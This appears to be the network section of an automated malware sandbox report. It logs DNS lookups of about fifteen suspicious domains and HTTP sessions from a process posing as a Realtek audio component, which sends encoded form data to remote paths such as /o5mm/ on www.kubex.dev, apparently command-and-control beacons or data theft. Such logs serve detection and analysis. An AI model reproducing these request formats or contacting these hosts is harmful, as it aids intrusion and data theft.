                                                                                                                                                                                                                                Dec 3, 2024 14:51:44.842542887 CET53585821.1.1.1192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:51:58.382852077 CET5531753192.168.11.201.1.1.1
                                                                                                                                                                                                                                Dec 3, 2024 14:51:58.521397114 CET53553171.1.1.1192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:12.161015987 CET5437553192.168.11.201.1.1.1
                                                                                                                                                                                                                                Dec 3, 2024 14:52:12.279875040 CET53543751.1.1.1192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:25.736339092 CET5183253192.168.11.201.1.1.1
                                                                                                                                                                                                                                Dec 3, 2024 14:52:25.976707935 CET53518321.1.1.1192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:40.451524973 CET5899853192.168.11.201.1.1.1
                                                                                                                                                                                                                                Dec 3, 2024 14:52:40.563632965 CET53589981.1.1.1192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:54.135973930 CET5593853192.168.11.201.1.1.1
                                                                                                                                                                                                                                Dec 3, 2024 14:52:55.150578022 CET5593853192.168.11.209.9.9.9
                                                                                                                                                                                                                                Dec 3, 2024 14:52:55.503623009 CET53559389.9.9.9192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:52:55.808995008 CET53559381.1.1.1192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:53:09.851281881 CET5256553192.168.11.209.9.9.9
                                                                                                                                                                                                                                Dec 3, 2024 14:53:09.968863010 CET53525659.9.9.9192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:53:24.160645008 CET5806253192.168.11.209.9.9.9
                                                                                                                                                                                                                                Dec 3, 2024 14:53:24.337733984 CET53580629.9.9.9192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:53:37.813925982 CET5616153192.168.11.209.9.9.9
                                                                                                                                                                                                                                Dec 3, 2024 14:53:37.922704935 CET53561619.9.9.9192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:53:45.983978987 CET5124253192.168.11.209.9.9.9
                                                                                                                                                                                                                                Dec 3, 2024 14:53:46.117522955 CET53512429.9.9.9192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:53:59.371551991 CET6395653192.168.11.209.9.9.9
                                                                                                                                                                                                                                Dec 3, 2024 14:53:59.488898993 CET53639569.9.9.9192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:12.884244919 CET6234353192.168.11.209.9.9.9
                                                                                                                                                                                                                                Dec 3, 2024 14:54:13.001126051 CET53623439.9.9.9192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:26.147017002 CET5199053192.168.11.209.9.9.9
                                                                                                                                                                                                                                Dec 3, 2024 14:54:26.294316053 CET53519909.9.9.9192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:39.644059896 CET6091153192.168.11.209.9.9.9
                                                                                                                                                                                                                                Dec 3, 2024 14:54:39.920598030 CET53609119.9.9.9192.168.11.20
                                                                                                                                                                                                                                Dec 3, 2024 14:54:53.469088078 CET4916053192.168.11.209.9.9.9
                                                                                                                                                                                                                                Dec 3, 2024 14:54:54.073628902 CET53491609.9.9.9192.168.11.20

                                                                                                                                                                                                                                DNS Queries

                                                                                                                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                Dec 3, 2024 14:51:28.802572966 CET192.168.11.201.1.1.10x2d96Standard query (0)www.88rtp.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Dec 3, 2024 14:51:44.635790110 CET192.168.11.201.1.1.10xb1a1Standard query (0)www.kubex.devA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Dec 3, 2024 14:51:58.382852077 CET192.168.11.201.1.1.10x6e0aStandard query (0)www.sido247.proA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Dec 3, 2024 14:52:12.161015987 CET192.168.11.201.1.1.10xd27bStandard query (0)www.glowups.lifeA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Dec 3, 2024 14:52:25.736339092 CET192.168.11.201.1.1.10x6adeStandard query (0)www.epicurecooks.worldA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Dec 3, 2024 14:52:40.451524973 CET192.168.11.201.1.1.10x4298Standard query (0)www.eichner.proA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Dec 3, 2024 14:52:54.135973930 CET192.168.11.201.1.1.10x1a97Standard query (0)www.juewucangku.xyzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Dec 3, 2024 14:52:55.150578022 CET192.168.11.209.9.9.90x1a97Standard query (0)www.juewucangku.xyzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Dec 3, 2024 14:53:09.851281881 CET192.168.11.209.9.9.90xe4c8Standard query (0)www.nng83.topA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Dec 3, 2024 14:53:24.160645008 CET192.168.11.209.9.9.90x7ef9Standard query (0)www.brickhills.siteA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Dec 3, 2024 14:53:37.813925982 CET192.168.11.209.9.9.90xf4d1Standard query (0)www.foggvdqutxzgea.xyzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Dec 3, 2024 14:53:45.983978987 CET192.168.11.209.9.9.90xc6e2Standard query (0)www.goldbracelet.topA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Dec 3, 2024 14:53:59.371551991 CET192.168.11.209.9.9.90xcd8eStandard query (0)www.0be.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Dec 3, 2024 14:54:12.884244919 CET192.168.11.209.9.9.90x7114Standard query (0)www.smartgov.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Dec 3, 2024 14:54:26.147017002 CET192.168.11.209.9.9.90x163eStandard query (0)www.hayaniya.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Dec 3, 2024 14:54:39.644059896 CET192.168.11.209.9.9.90xeeeeStandard query (0)www.dialogpriest.onlineA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Dec 3, 2024 14:54:53.469088078 CET192.168.11.209.9.9.90xc451Standard query (0)www.224466.topA (IP address)IN (0x0001)false

                                                                                                                                                                                                                                DNS Answers

                                                                                                                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                Dec 3, 2024 14:51:28.924959898 CET1.1.1.1192.168.11.200x2d96No error (0)www.88rtp.biz88rtp.bizCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                Dec 3, 2024 14:51:28.924959898 CET1.1.1.1192.168.11.200x2d96No error (0)88rtp.biz172.96.191.39A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Dec 3, 2024 14:51:44.842542887 CET1.1.1.1192.168.11.200xb1a1No error (0)www.kubex.dev217.160.0.183A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Dec 3, 2024 14:51:58.521397114 CET1.1.1.1192.168.11.200x6e0aNo error (0)www.sido247.prosido247.proCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                Dec 3, 2024 14:51:58.521397114 CET1.1.1.1192.168.11.200x6e0aNo error (0)sido247.pro84.32.84.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Dec 3, 2024 14:52:12.279875040 CET1.1.1.1192.168.11.200xd27bNo error (0)www.glowups.life209.74.79.42A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Dec 3, 2024 14:52:25.976707935 CET1.1.1.1192.168.11.200x6adeNo error (0)www.epicurecooks.world208.91.197.27A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Dec 3, 2024 14:52:40.563632965 CET1.1.1.1192.168.11.200x4298No error (0)www.eichner.pro89.31.143.90A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Dec 3, 2024 14:52:55.503623009 CET9.9.9.9192.168.11.200x1a97No error (0)www.juewucangku.xyz8.136.96.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Dec 3, 2024 14:52:55.808995008 CET1.1.1.1192.168.11.200x1a97No error (0)www.juewucangku.xyz8.136.96.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Dec 3, 2024 14:53:09.968863010 CET9.9.9.9192.168.11.200xe4c8No error (0)www.nng83.topnng83.topCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                Dec 3, 2024 14:53:09.968863010 CET9.9.9.9192.168.11.200xe4c8No error (0)nng83.top38.47.233.4A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Dec 3, 2024 14:53:24.337733984 CET9.9.9.9192.168.11.200x7ef9No error (0)www.brickhills.site103.224.182.242A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Dec 3, 2024 14:53:37.922704935 CET9.9.9.9192.168.11.200xf4d1Name error (3)www.foggvdqutxzgea.xyznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Dec 3, 2024 14:53:46.117522955 CET9.9.9.9192.168.11.200xc6e2No error (0)www.goldbracelet.top172.67.201.49A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Dec 3, 2024 14:53:46.117522955 CET9.9.9.9192.168.11.200xc6e2No error (0)www.goldbracelet.top104.21.36.239A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Dec 3, 2024 14:53:59.488898993 CET9.9.9.9192.168.11.200xcd8eNo error (0)www.0be.info0be.infoCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                Dec 3, 2024 14:53:59.488898993 CET9.9.9.9192.168.11.200xcd8eNo error (0)0be.info173.0.157.187A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Dec 3, 2024 14:54:13.001126051 CET9.9.9.9192.168.11.200x7114No error (0)www.smartgov.shop13.248.169.48A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Dec 3, 2024 14:54:13.001126051 CET9.9.9.9192.168.11.200x7114No error (0)www.smartgov.shop76.223.54.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Dec 3, 2024 14:54:26.294316053 CET9.9.9.9192.168.11.200x163eNo error (0)www.hayaniya.orghayaniya.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                Dec 3, 2024 14:54:26.294316053 CET9.9.9.9192.168.11.200x163eNo error (0)hayaniya.org192.185.147.100A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Dec 3, 2024 14:54:39.920598030 CET9.9.9.9192.168.11.200xeeeeNo error (0)www.dialogpriest.online176.31.209.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                Dec 3, 2024 14:54:54.073628902 CET9.9.9.9192.168.11.200xc451No error (0)www.224466.top45.197.47.177A (IP address)IN (0x0001)false

                                                                                                                                                                                                                                HTTP Request Dependency Graph

                                                                                                                                                                                                                                • www.88rtp.biz
                                                                                                                                                                                                                                • www.kubex.dev
                                                                                                                                                                                                                                • www.sido247.pro
                                                                                                                                                                                                                                • www.glowups.life
                                                                                                                                                                                                                                • www.epicurecooks.world
                                                                                                                                                                                                                                • www.eichner.pro
                                                                                                                                                                                                                                • www.juewucangku.xyz
                                                                                                                                                                                                                                • www.nng83.top
                                                                                                                                                                                                                                • www.brickhills.site
                                                                                                                                                                                                                                • www.goldbracelet.top
                                                                                                                                                                                                                                • www.0be.info
                                                                                                                                                                                                                                • www.smartgov.shop
                                                                                                                                                                                                                                • www.hayaniya.org
                                                                                                                                                                                                                                • www.dialogpriest.online
                                                                                                                                                                                                                                • www.224466.top

                                                                                                                                                                                                                                HTTP Packets

                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                0192.168.11.2049759172.96.191.39807488C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Dec 3, 2024 14:51:29.266508102 CET416OUTGET /oz0e/?pluxVm=N0iBPOr2h1wf3hrk0fV7bCYuQaQcnemlKlX+67l0LxDwIz/NET6JyzgCPnJBSBJZztg4pX1Iwr0Nd76JZuhGak0dZt9NjSAeSo6fySf0UlwbimsbHDdeRZs=&Z1EO=OvfHeluUy HTTP/1.1
                                                                                                                                                                                                                                Host: www.88rtp.biz
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                                                                                                                                                                                                                                Dec 3, 2024 14:51:29.602164030 CET1033INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                                                                                                                                pragma: no-cache
                                                                                                                                                                                                                                content-type: text/html
                                                                                                                                                                                                                                content-length: 796
                                                                                                                                                                                                                                date: Tue, 03 Dec 2024 13:51:29 GMT
                                                                                                                                                                                                                                server: LiteSpeed
                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                1192.168.11.2049760217.160.0.183807488C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Dec 3, 2024 14:51:45.033953905 CET671OUTPOST /o5mm/ HTTP/1.1
                                                                                                                                                                                                                                Host: www.kubex.dev
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Origin: http://www.kubex.dev
                                                                                                                                                                                                                                Referer: http://www.kubex.dev/o5mm/
                                                                                                                                                                                                                                Content-Length: 203
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                                                                                                                                                                                                                                Data Raw: 70 6c 75 78 56 6d 3d 30 30 78 36 4e 63 31 4f 48 63 67 48 52 39 45 73 36 49 49 47 6e 30 6e 72 57 5a 4a 74 70 33 42 62 37 58 6b 69 62 64 39 5a 68 79 64 47 6b 79 66 71 51 69 53 6b 73 67 4e 4f 69 41 6b 77 31 58 53 54 2f 42 41 49 34 49 42 67 4e 31 49 58 34 70 52 51 34 38 74 6a 46 62 6a 30 57 4d 6c 2f 59 64 2b 6e 30 48 72 32 77 6b 45 34 70 35 48 2f 47 45 50 67 4d 69 6b 74 62 4c 63 56 46 54 4b 6e 4b 6b 6b 74 61 76 72 65 64 71 4a 74 43 44 39 47 6d 59 4d 7a 57 73 74 65 5a 36 47 39 67 37 2b 47 2f 4e 6d 74 33 54 65 64 46 79 66 74 54 57 4e 30 42 56 2f 51 58 6e 57 6b 4b 71 6c 30 4f 59 54 50 6b 53 6d 4f 45 67 3d 3d
                                                                                                                                                                                                                                Data Ascii: pluxVm=00x6Nc1OHcgHR9Es6IIGn0nrWZJtp3Bb7Xkibd9ZhydGkyfqQiSksgNOiAkw1XST/BAI4IBgN1IX4pRQ48tjFbj0WMl/Yd+n0Hr2wkE4p5H/GEPgMiktbLcVFTKnKkktavredqJtCD9GmYMzWsteZ6G9g7+G/Nmt3TedFyftTWN0BV/QXnWkKql0OYTPkSmOEg==
                                                                                                                                                                                                                                Dec 3, 2024 14:51:45.238734961 CET558INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Date: Tue, 03 Dec 2024 13:51:45 GMT
                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                Data Raw: 31 37 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f c3 30 0c be ef 57 98 70 4e b3 32 0e 5b d7 ee c0 36 09 a4 f1 10 14 01 c7 d0 ba 6b 44 9a 94 d4 a3 1b bf 9e b4 e3 2d c4 c9 4e f4 3d ec cf f1 c1 e2 72 9e 3e 5c 2d a1 a4 4a c3 d5 ed c9 ea 6c 0e 8c 0b 71 37 9a 0b b1 48 17 70 7f 9a 9e af 20 0c 86 90 3a 69 1a 45 ca 1a a9 85 58 5e b0 01 2b 89 ea 48 88 b6 6d 83 76 14 58 b7 16 e9 b5 d8 76 5a 61 47 7e 6f 39 7d 63 06 39 e5 6c 36 88 7b 43 2d cd 3a 61 68 18 6c 2b 1d fd 78 99 26 f9 43 3e 9c 4c 26 7b 55 af 01 71 89 32 f7 15 62 52 a4 b1 eb 60 e9 9c 75 70 3c 3c 06 0e 17 96 a0 b0 1b 93 77 10 f1 89 89 2b 24 09 99 35 84 86 12 46 b8 25 d1 8d 33 85 ac 94 ae 41 4a 36 54 f0 31 f3 a1 50 cd f1 79 a3 5e 12 36 df c3 79 ba ab b1 f3 86 5f 2a c6 f2 4c 66 25 fe 64 f5 5f bc b3 72 56 f7 23 8b f7 99 e3 47 9b ef a0 a1 9d c6 84 15 1e c0 0b 59 29 bd 8b a4 53 52 4f f7 16 65 f8 81 c8 ac b6 2e 3a 1c ca d1 d1 38 9b f6 f8 46 bd 62 e4 0f 83 d5 1e fd cf ea 65 d8 4f 5c 7f a8 7d f1 87 c1 f8 93 bf 50 08 fe 20 b8 c6 47 34 08 37 a8 08 e1 c9 1a [TRUNCATED]
                                                                                                                                                                                                                                Data Ascii: 173}QKO0WpN2[6kD-N=r>\-Jlq7Hp :iEX^+HmvXvZaG~o9}c9l6{C-:ahl+x&C>L&{Uq2bR`up<<w+$5F%3AJ6T1Py^6y_*Lf%d_rV#GY)SROe.:8FbeO\}P G47k,|hEKZ{XtAo[Y0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                2192.168.11.2049761217.160.0.183807488C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Dec 3, 2024 14:51:47.747675896 CET691OUTPOST /o5mm/ HTTP/1.1
                                                                                                                                                                                                                                Host: www.kubex.dev
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Origin: http://www.kubex.dev
                                                                                                                                                                                                                                Referer: http://www.kubex.dev/o5mm/
                                                                                                                                                                                                                                Content-Length: 223
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                                                                                                                                                                                                                                Data Raw: 70 6c 75 78 56 6d 3d 30 30 78 36 4e 63 31 4f 48 63 67 48 58 63 55 73 32 4c 51 47 33 6b 6e 71 4b 70 4a 74 2b 6e 42 66 37 58 59 69 62 63 35 7a 68 48 74 47 6b 54 76 71 57 54 53 6b 6c 77 4e 4f 73 67 6b 31 37 33 53 59 2f 42 38 2b 34 4a 39 67 4e 31 4d 58 34 6f 68 51 34 50 56 67 45 4c 6a 32 4f 38 6c 78 46 4e 2b 6e 30 48 72 32 77 6b 51 53 70 35 76 2f 47 56 66 67 50 44 6b 73 46 37 63 4b 55 54 4b 6e 62 55 6b 70 61 76 72 67 64 76 70 44 43 47 68 47 6d 5a 38 7a 57 34 5a 64 51 36 48 30 2f 72 2f 35 35 50 57 6c 78 79 4b 67 44 41 72 52 4b 48 42 75 4e 6a 79 4b 4b 56 69 41 4a 35 35 47 4b 6f 71 6e 6d 51 6e 56 5a 70 63 39 42 35 6c 2f 5a 6b 76 65 71 44 6d 30 57 69 76 50 2b 70 34 3d
                                                                                                                                                                                                                                Data Ascii: pluxVm=00x6Nc1OHcgHXcUs2LQG3knqKpJt+nBf7XYibc5zhHtGkTvqWTSklwNOsgk173SY/B8+4J9gN1MX4ohQ4PVgELj2O8lxFN+n0Hr2wkQSp5v/GVfgPDksF7cKUTKnbUkpavrgdvpDCGhGmZ8zW4ZdQ6H0/r/55PWlxyKgDArRKHBuNjyKKViAJ55GKoqnmQnVZpc9B5l/ZkveqDm0WivP+p4=
                                                                                                                                                                                                                                Dec 3, 2024 14:51:47.973843098 CET558INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Date: Tue, 03 Dec 2024 13:51:47 GMT
                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                Data Raw: 31 37 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f c3 30 0c be ef 57 98 70 4e b3 32 0e 5b d7 ee c0 36 09 a4 f1 10 14 01 c7 d0 ba 6b 44 9a 94 d4 a3 1b bf 9e b4 e3 2d c4 c9 4e f4 3d ec cf f1 c1 e2 72 9e 3e 5c 2d a1 a4 4a c3 d5 ed c9 ea 6c 0e 8c 0b 71 37 9a 0b b1 48 17 70 7f 9a 9e af 20 0c 86 90 3a 69 1a 45 ca 1a a9 85 58 5e b0 01 2b 89 ea 48 88 b6 6d 83 76 14 58 b7 16 e9 b5 d8 76 5a 61 47 7e 6f 39 7d 63 06 39 e5 6c 36 88 7b 43 2d cd 3a 61 68 18 6c 2b 1d fd 78 99 26 f9 43 3e 9c 4c 26 7b 55 af 01 71 89 32 f7 15 62 52 a4 b1 eb 60 e9 9c 75 70 3c 3c 06 0e 17 96 a0 b0 1b 93 77 10 f1 89 89 2b 24 09 99 35 84 86 12 46 b8 25 d1 8d 33 85 ac 94 ae 41 4a 36 54 f0 31 f3 a1 50 cd f1 79 a3 5e 12 36 df c3 79 ba ab b1 f3 86 5f 2a c6 f2 4c 66 25 fe 64 f5 5f bc b3 72 56 f7 23 8b f7 99 e3 47 9b ef a0 a1 9d c6 84 15 1e c0 0b 59 29 bd 8b a4 53 52 4f f7 16 65 f8 81 c8 ac b6 2e 3a 1c ca d1 d1 38 9b f6 f8 46 bd 62 e4 0f 83 d5 1e fd cf ea 65 d8 4f 5c 7f a8 7d f1 87 c1 f8 93 bf 50 08 fe 20 b8 c6 47 34 08 37 a8 08 e1 c9 1a [TRUNCATED]
                                                                                                                                                                                                                                Data Ascii: 173}QKO0WpN2[6kD-N=r>\-Jlq7Hp :iEX^+HmvXvZaG~o9}c9l6{C-:ahl+x&C>L&{Uq2bR`up<<w+$5F%3AJ6T1Py^6y_*Lf%d_rV#GY)SROe.:8FbeO\}P G47k,|hEKZ{XtAo[Y0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                3192.168.11.2049762217.160.0.183807488C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Dec 3, 2024 14:51:50.465363026 CET2578OUTPOST /o5mm/ HTTP/1.1
                                                                                                                                                                                                                                Host: www.kubex.dev
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Origin: http://www.kubex.dev
                                                                                                                                                                                                                                Referer: http://www.kubex.dev/o5mm/
                                                                                                                                                                                                                                Content-Length: 7371
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                                                                                                                                                                                                                                Data Raw: 70 6c 75 78 56 6d 3d 30 30 78 36 4e 63 31 4f 48 63 67 48 58 63 55 73 32 4c 51 47 33 6b 6e 71 4b 70 4a 74 2b 6e 42 66 37 58 59 69 62 63 35 7a 68 48 6c 47 6b 67 33 71 56 77 36 6b 2f 77 4e 4f 6b 41 6b 30 37 33 53 2f 2f 46 51 69 34 4a 78 65 4e 33 45 58 35 4c 35 51 36 2b 56 67 4b 4c 6a 32 48 63 6c 38 59 64 2b 2b 30 48 37 36 77 6e 6f 53 70 35 76 2f 47 57 58 67 59 43 6b 73 48 37 63 56 46 54 4b 72 4b 6b 6b 46 61 76 54 57 64 76 74 39 42 31 35 47 6d 35 73 7a 52 4c 78 64 52 61 48 32 38 72 2f 68 35 50 62 37 78 7a 6d 57 44 44 32 32 4b 47 5a 75 63 53 50 6d 54 46 36 68 4c 6f 38 4b 49 72 57 4d 6f 69 6a 6c 45 72 55 63 4d 59 6c 52 5a 54 66 31 72 67 57 49 47 77 62 2b 6c 63 37 75 58 78 42 43 44 43 50 6d 57 75 35 53 78 57 79 6b 51 4a 64 79 4e 65 69 41 66 72 63 79 78 2f 49 62 78 62 4c 59 73 77 75 74 43 6a 4d 6d 79 76 65 59 49 4b 6e 65 54 6a 53 73 67 43 52 74 43 70 4f 4a 48 69 70 53 51 2b 33 76 49 54 71 45 41 35 79 49 6e 56 6b 50 4b 45 64 31 63 39 44 4c 68 51 6c 34 52 6c 41 64 70 2f 79 6d 6e 76 4e 6f 38 51 36 46 7a 4f 72 [TRUNCATED]
